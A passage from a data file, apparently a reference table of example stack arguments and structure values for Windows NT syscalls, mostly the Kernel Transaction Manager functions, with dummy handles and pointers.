"additionalComment": "None (no timeout specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "IsolationFlags = 0 (default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "IsolationLevel = 0 (default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "CreateOptions = 0 (default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None TmHandle (no transaction manager handle specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None Uow (no UOW GUID specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None ObjectAttributes (default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F0001", "additionalComment": "DesiredAccess (TRANSACTION_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE TransactionHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtCreateTransactionManager": { "ntFunc": "NtCreateTransactionManager", "pushes": [ { "value": "0x00000000", "additionalComment": "CommitStrength = 0 (default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "CreateOptions = 0 (default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None LogFileName (no log file specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None ObjectAttributes (default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F0001", "additionalComment": "DesiredAccess (TRANSACTIONMANAGER_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to HANDLE TmHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtEnumerateTransactionObject": { "ntFunc": "NtEnumerateTransactionObject", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000010", "additionalComment": "ObjectCursorLength = 0x10 (16 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None ObjectCursor (no cursor structure provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "KTMOBJECT_TYPE = KTMOBJECT_TRANSACTION", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE RootObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtFreezeTransactions": { "ntFunc": "NtFreezeTransactions", "pushes": [ { "value": "0x00000000", "additionalComment": "None ThawTime_Out (no timeout specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None FreezeTime_Out (no timeout specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtGetNotificationResourceManager": { "ntFunc": "NtGetNotificationResourceManager", "pushes": [ { "value": "0x00000000", "additionalComment": "AsynchronousContext = 0 (default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Asynchronous = 0 (synchronous operation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None optional PULONG (no return value requested)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None Time_Out (no timeout specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "NotificationLength = 0x1000 (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None TransactionNotification (no notification buffer provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ResourceManagerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtOpenEnlistment": { "ntFunc": "NtOpenEnlistment", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for OBJECT_ATTRIBUTES (optional, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for LPGUID EnlistmentGuid (optional, commonly None)", "structurePointer": "GUID", "structureRef": None, "structureValueExpectations": "GUID structure representing the enlistment identifier.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None ResourceManagerHandle (commonly invalid or defaulted in examples)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x000F0000", "additionalComment": "DesiredAccess (GENERIC_READ | GENERIC_WRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE EnlistmentHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtOpenResourceManager": { "ntFunc": "NtOpenResourceManager", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for OBJECT_ATTRIBUTES (optional, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for LPGUID ResourceManagerGuid (optional, commonly None)", "structurePointer": "GUID", "structureRef": None, "structureValueExpectations": "GUID structure representing the resource manager identifier.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None TmHandle (commonly invalid or defaulted in examples)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x000F0000", "additionalComment": "DesiredAccess (GENERIC_READ | GENERIC_WRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to HANDLE ResourceManagerHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtOpenTransaction": { "ntFunc": "NtOpenTransaction", "pushes": [ { "value": "0x00000000", "additionalComment": "None TmHandle (commonly invalid or defaulted in examples)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for LPGUID Uow (optional, commonly None)", "structurePointer": "GUID", "structureRef": None, "structureValueExpectations": "GUID structure representing the unit of work identifier.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for OBJECT_ATTRIBUTES (optional, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x000F0000", "additionalComment": "DesiredAccess (GENERIC_READ | GENERIC_WRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE TransactionHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtOpenTransactionManager": { "ntFunc": "NtOpenTransactionManager", "pushes": [ { "value": "0x00000000", "additionalComment": "OpenOptions (commonly 0 for default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for LPGUID TmIdentity (optional, commonly None)", "structurePointer": "GUID", "structureRef": None, "structureValueExpectations": "GUID structure representing the transaction manager identity.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for PUNICODE_STRING LogFileName (optional, commonly None)", "structurePointer": "UNICODE_STRING", "structureRef": None, "structureValueExpectations": "UNICODE_STRING structure for log file name.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for OBJECT_ATTRIBUTES (optional, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x000F0000", "additionalComment": "DesiredAccess (GENERIC_READ | GENERIC_WRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to HANDLE TmHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtPrepareComplete": { "ntFunc": "NtPrepareComplete", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for PLARGE_INTEGER TmVirtualClock (optional, commonly None)", "structurePointer": "LARGE_INTEGER", "structureRef": None, "structureValueExpectations": "64-bit integer value representing the virtual clock.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None EnlistmentHandle (commonly invalid or defaulted in examples)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtPrepareEnlistment": { "ntFunc": "NtPrepareEnlistment", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for PLARGE_INTEGER TmVirtualClock (optional, commonly None)", "structurePointer": "LARGE_INTEGER", "structureRef": None, "structureValueExpectations": "Optional timestamp; commonly None.", "pointedValue": None }, { "value": "0xdead1000", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtPrePrepareComplete": { "ntFunc": "NtPrePrepareComplete", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for PLARGE_INTEGER TmVirtualClock (optional, commonly None)", "structurePointer": "LARGE_INTEGER", "structureRef": None, "structureValueExpectations": "Optional timestamp; commonly None.", "pointedValue": None }, { "value": "0xdead2000", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtPrePrepareEnlistment": { "ntFunc": "NtPrePrepareEnlistment", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for PLARGE_INTEGER TmVirtualClock (optional, commonly None)", "structurePointer": "LARGE_INTEGER", "structureRef": None, "structureValueExpectations": "Optional timestamp; commonly None.", "pointedValue": None }, { "value": "0xdead3000", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtPropagationComplete": { "ntFunc": "NtPropagationComplete", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for Buffer (optional, commonly None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": "Optional buffer for propagation data.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BufferLength = 0 (no buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "RequestCookie (dummy value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xdead4000", "additionalComment": "HANDLE ResourceManagerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtPropagationFailed": { "ntFunc": "NtPropagationFailed", "pushes": [ { "value": "0xc0000022", "additionalComment": "NTSTATUS PropStatus (STATUS_ACCESS_DENIED, dummy error)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "RequestCookie (dummy value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xdead5000", "additionalComment": "HANDLE ResourceManagerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryInformationEnlistment": { "ntFunc": "NtQueryInformationEnlistment", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer, optional output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000100", "additionalComment": "EnlistmentInformationLength (256 bytes, typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to buffer for EnlistmentInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0100" }, { "value": "0x00000001", "additionalComment": "EnlistmentInformationClass (ENLISTMENT_BASIC_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryInformationResourceManager": { "ntFunc": "NtQueryInformationResourceManager", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer, optional output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000100", "additionalComment": "ResourceManagerInformationLength (256 bytes, typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to buffer for ResourceManagerInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0110" }, { "value": "0x00000001", "additionalComment": "ResourceManagerInformationClass (RESOURCEMANAGER_BASIC_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000bcde", "additionalComment": "HANDLE ResourceManagerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryInformationTransaction": { "ntFunc": "NtQueryInformationTransaction", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer, optional output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000100", "additionalComment": "TransactionInformationLength (256 bytes, typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to buffer for TransactionInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0120" }, { "value": "0x00000001", "additionalComment": "TransactionInformationClass (TRANSACTION_BASIC_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000cdef", "additionalComment": "HANDLE TransactionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryInformationTransactionManager": { "ntFunc": "NtQueryInformationTransactionManager", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer, optional output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000100", "additionalComment": "TransactionManagerInformationLength (256 bytes, typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to buffer for TransactionManagerInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0130" }, { "value": "0x00000001", "additionalComment": "TransactionManagerInformationClass (TRANSACTIONMANAGER_BASIC_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000def0", "additionalComment": "HANDLE TransactionManagerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtReadOnlyEnlistment": { "ntFunc": "NtReadOnlyEnlistment", "pushes": [ { "value": "0xbadd0080", "additionalComment": "Pointer to LARGE_INTEGER TmVirtualClock (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct51", "structureValueExpectations": "64-bit signed integer representing a virtual clock value.", "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct51": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x01d8e3b5a7c0000", "fieldComment": "Sample virtual clock value" } ] } } }, "NtRecoverEnlistment": { "ntFunc": "NtRecoverEnlistment", "pushes": [ { "value": "0x00000000", "additionalComment": "EnlistmentKey (None, commonly unused)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRecoverResourceManager": { "ntFunc": "NtRecoverResourceManager", "pushes": [ { "value": "0x0000bcde", "additionalComment": "HANDLE ResourceManagerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRecoverTransactionManager": { "ntFunc": "NtRecoverTransactionManager", "pushes": [ { "value": "0x0000cdef", "additionalComment": "HANDLE TransactionManagerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRegisterProtocolAddressInformation": { "ntFunc": "NtRegisterProtocolAddressInformation", "pushes": [ { "value": "0x00000001", "additionalComment": "CreateOptions (example: 1, e.g. RM_PROTOCOL_REGISTER_VOLATILE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to ProtocolInformation (dummy pointer, typically a buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0x00000010", "additionalComment": "ProtocolInformationSize (16 bytes, typical small structure)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "ProtocolId (dummy protocol ID value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000bcde", "additionalComment": "HANDLE ResourceManager (dummy handle, matches ResourceManagerHandle above)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRenameTransactionManager": { "ntFunc": "NtRenameTransactionManager", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to LPGUID ExistingTransactionManagerGuid (dummy pointer)", "structurePointer": "GUID", "structureRef": "struct52", "structureValueExpectations": "A valid GUID structure identifying the existing transaction manager.", "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to UNICODE_STRING LogFileName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct53", "structureValueExpectations": "UNICODE_STRING structure describing the new log file name.", "pointedValue": None } ], "structures": { "struct52": { "type": "GUID", "fields": [ { "fieldName": "Data1", "fieldType": "ULONG", "fieldValue": "0x12345678", "fieldComment": "Example GUID Data1" }, { "fieldName": "Data2", "fieldType": "USHORT", "fieldValue": "0x9abc", "fieldComment": "Example GUID Data2" }, { "fieldName": "Data3", "fieldType": "USHORT", "fieldValue": "0xdef0", "fieldComment": "Example GUID Data3" }, { "fieldName": "Data4", "fieldType": "UCHAR[8]", "fieldValue": "0x1122334455667788", "fieldComment": "Example GUID Data4" } ] }, "struct53": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0014", "fieldComment": "20 bytes (10 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes buffer" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0030", "fieldComment": "Pointer to buffer (dummy pointer)" } ] } } }, "NtRollBackComplete": { "ntFunc": "NtRollBackComplete", "pushes": [ { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER TmVirtualClock (None, not used in typical call)", "structurePointer": "LARGE_INTEGER", "structureRef": None, "structureValueExpectations": "Pointer to LARGE_INTEGER specifying a virtual clock value, often None.", "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRollBackEnlistment": { "ntFunc": "NtRollBackEnlistment", "pushes": [ { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER TmVirtualClock (None, not used in typical call)", "structurePointer": "LARGE_INTEGER", "structureRef": None, "structureValueExpectations": "Pointer to LARGE_INTEGER specifying a virtual clock value, often None.", "pointedValue": None }, { "value": "0x0000bcde", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRollBackTransaction": { "ntFunc": "NtRollBackTransaction", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOLEAN Wait (TRUE, wait for rollback to complete)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000cdef", "additionalComment": "HANDLE TransactionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRollforwardTransactionManager": { "ntFunc": "NtRollforwardTransactionManager", "pushes": [ { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER TmVirtualClock (None, not used in typical call)", "structurePointer": "LARGE_INTEGER", "structureRef": None, "structureValueExpectations": "Pointer to LARGE_INTEGER specifying a virtual clock value, often None.", "pointedValue": None }, { "value": "0x0000def0", "additionalComment": "HANDLE TmHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationEnlistment": { "ntFunc": "NtSetInformationEnlistment", "pushes": [ { "value": "0x00000010", "additionalComment": "ULONG EnlistmentInformationLength (16 bytes, typical small info structure)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PVOID EnlistmentInformation (dummy pointer, points to info buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass (EnlistmentBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000ef01", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationResourceManager": { "ntFunc": "NtSetInformationResourceManager", "pushes": [ { "value": "0x00000010", "additionalComment": "ResourceManagerInformationLength (16 bytes, typical for a small structure)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to ResourceManagerInformation (dummy pointer, could be a structure or buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "ResourceManagerInformationClass (ResourceManagerBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE ResourceManagerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationTransaction": { "ntFunc": "NtSetInformationTransaction", "pushes": [ { "value": "0x00000020", "additionalComment": "TransactionInformationLength (32 bytes, typical for a structure)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to TransactionInformation (dummy pointer, could be a structure or buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000002", "additionalComment": "TransactionInformationClass (TransactionPropertiesInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000dcba", "additionalComment": "HANDLE TransactionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationTransactionManager": { "ntFunc": "NtSetInformationTransactionManager", "pushes": [ { "value": "0x00000018", "additionalComment": "TransactionManagerInformationLength (24 bytes, typical for a structure)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to TransactionManagerInformation (dummy pointer, could be a structure or buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "TransactionManagerInformationClass (TmBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000beef", "additionalComment": "HANDLE TmHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSinglePhaseReject": { "ntFunc": "NtSinglePhaseReject", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to LARGE_INTEGER TmVirtualClock (dummy pointer, often None)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct54", "structureValueExpectations": "64-bit integer representing a virtual clock value.", "pointedValue": None }, { "value": "0x0000cafe", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct54": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x01d7e6a5b4000000", "fieldComment": "Sample virtual clock value" } ] } } }, "NtStartTm": { "ntFunc": "NtStartTm", "pushes": [], "structures": {} }, "NtThawRegistry": { "ntFunc": "NtThawRegistry", "pushes": [], "structures": {} }, "NtThawTransactions": { "ntFunc": "NtThawTransactions", "pushes": [], "structures": {} }, "NtDrawText": { "ntFunc": "NtDrawText", "pushes": [ { "value": "0x00000000", "additionalComment": "PUNICODE_STRING Text (None, no text to draw)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtTraceControl": { "ntFunc": "NtTraceControl", "pushes": [ { "value": "0x00000000", "additionalComment": "PULONG ReturnLength (None, not requesting return length)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG __OUTBufferLen (zero, no output buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID __OUTBuffer (None, no output buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG InBufferLen (zero, no input buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID InBuffer (None, no input buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG FunctionCode (zero, no operation specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetWnfProcessNotificationEvent": { "ntFunc": "NtSetWnfProcessNotificationEvent", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE Unknown1 (None handle, default/unused)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationVirtualMemory": { "ntFunc": "NtSetInformationVirtualMemory", "pushes": [ { "value": "0x00000020", "additionalComment": "ULONG VmInformationLength (example: 32 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to VmInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0010", "additionalComment": "Pointer to MEMORY_RANGE_ENTRY array (dummy pointer)", "structurePointer": "MEMORY_RANGE_ENTRY", "structureRef": "struct55", "structureValueExpectations": "Array of MEMORY_RANGE_ENTRY structures describing memory ranges.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG_PTR NumberOfEntries (example: 1 entry)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "VIRTUAL_MEMORY_INFORMATION_CLASS VmInformationClass (example: 